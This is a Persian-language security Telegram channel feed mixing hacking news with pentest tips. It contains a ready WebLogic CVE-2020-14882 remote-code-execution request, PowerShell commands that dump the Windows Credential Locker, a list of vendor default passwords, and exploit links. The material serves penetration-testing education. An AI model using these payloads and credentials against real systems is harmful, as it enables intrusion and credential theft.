امنیت اطلاعات
851 subscribers
2.38K photos
153 videos
156 files
2.58K links
آخرین اخبار هک، ابزارها و روش های تست نفوذ را در این کانال دنبال کنید

بخش انگلیسی :
https://t.iss.one/sec_nerd_en


برای عضویت در گروه پیام بدید:
@rect00
Download Telegram
آسیب پذیری عجیب Tiki Wiki Cms Groupware

CVE-2020-15906


https://github.com/S1lkys/CVE-2020-15906


بعد از بروت فورس و قفل شدن اکانت ادمین، امکان ورود با پسورد خالی فراهم میشود!

#web
#pentest
#writeup


@sec_nerd
Retrieve credentials stored in the Win Credential Locker

PS C:\> [Windows.Security.Credentials.PasswordVault,.,ContentType=WindowsRuntime]
PS C:\> (New-Object Windows.Security.Credentials.PasswordVault).RetrieveAll()

#oscp #security #pentest #ps #windows

@sec_nerd
آسیب پذیری RCE در weblogic
بدون نیاز به احراز هویت

CVE-2020–14882

https://x.x.x.x:7001/console/images/%252E%252E%252Fconsole.portal

POST:

_nfpb=true&_pageLabel=&handle=https://com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27calc.exe%27);%22)


https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf

#weblogic
#rce
#java


@sec_nerd
دپارتمان امنیت ملی امریکا و FBI طی گزارشی به جزییات عملیات هکرهای ایرانی در سرقت آراء و تاثیرگذاری بر انتخابات امریکا پرداختند.

در این گزارش مشخص شد هکرهای ایرانی با ابزارهایی نظیر Acunetix و sqlmap اقدام به نفوذ به وبسایتهای مرتبط با انتخابات کرده و با کشف مشکلاتی نظیر باگهای sql injection و directory traversal توانستند اطلاعات رای دهندگان را بدست آورند.

این اطلاعات در ارسال ایمیل های فیک از سوی کامیونیتی Proud Boy و تهدید رای دهندگان به رای دادن به نفع ترامپ به کار گرفته شد.

همچنین اعلام شد این هکرها از nordvpn و برخی سرویس های وی پی ان دیگر در این عملیات بهره برده اند.

https://www.bleepingcomputer.com/news/security/fbi-how-iranian-hackers-stole-voter-info-from-state-election-sites/


#news
#iran
#usa


@sec_nerd
برخی پسوردهای دیفالت در برخی دستگاهها

Cisco: cisco:cisco
Citrix: nsroot:nsroot
Dell iDRAC: root:calvin
Juniper: super:juniper123
pfSense: admin:pfsense
SAP: SAP*:06071992
Tomcat: tomcat:tomcat
UniFi: ubnt:ubnt
Weblogic: weblogic:weblogic1
Zabbix: Admin:zabbix


#pentest
#network


@sec_nerd
استخراج اطلاعات از اسناد با sammler

https://github.com/redcode-labs/sammler


#misc
#meta


@sec_nerd
اکسپلویت آسیب پذیری لو دادن اطلاعات در sharepoint مایکروسافت

CVE: CVE-2020-17017


https://srcincite.io/pocs/cve-2020-17017.py.txt


#sharepoint
#windows


@sec_nerd
برنامه نویس سابق مایکروسافت به ۹ سال حبس محکوم شد!
ولودیمیر کواشوک ۲۶ ساله که اهل اوکراین است از سال ۲۰۱۶ بعنوان یک برنامه نویس تمام وقت با مایکروسافت کار خود را شروع کرد و در سال ۲۰۱۸ این همکاری به پایان رسید.
او در طی این مدت در پروژه ی فروش آنلاین مایکروسافت مشغول به فعالیت بود که با سوء استفاده از دسترسی خود اقدام به دزدیدن CSV (چیزی شبیه به گیفت کارت) نمود.
در ابتدا او با دزدی مقادیر اندک کار خود را ادامه داد و تا ۱۲ هزار دلار از این طریق بدست آورد اما پس از آن به این مقدار اکتفا نکرد و دست به دزدی میلیون دلاری زد.
کواشوک در نهایت مقدار 2.8 میلیون دلار به سرقت برد. حالا او باید 8.34 میلیون دلار جریمه بپردازد و با ۱۸ عنوان اتهامی ۹ سال را در زندان بگذراند.


https://www.darkreading.com/attacks-breaches/former-microsoft-software-engineer-sentenced-to-9-years-in-prison/d/d-id/1339422


#news
#microsoft


@sec_nerd
👍1
نسخه چهارم ابزار معروف پسانفوذ cobalt strike دیکامپایل و بصورت متن باز و کرک شده در اختیار عموم قرار گرفت
https://www.bleepingcomputer.com/news/security/alleged-source-code-of-cobalt-strike-toolkit-shared-online/



سورس کد منتشر شده، سورس اصلی این ابزار نیست

کامنت کردن یک خط از کد برای کرک شدن آن کفایت میکند!


https://twitter.com/0xAmit/status/1326648804582563841


#tools
#post_exploitation



@sec_nerd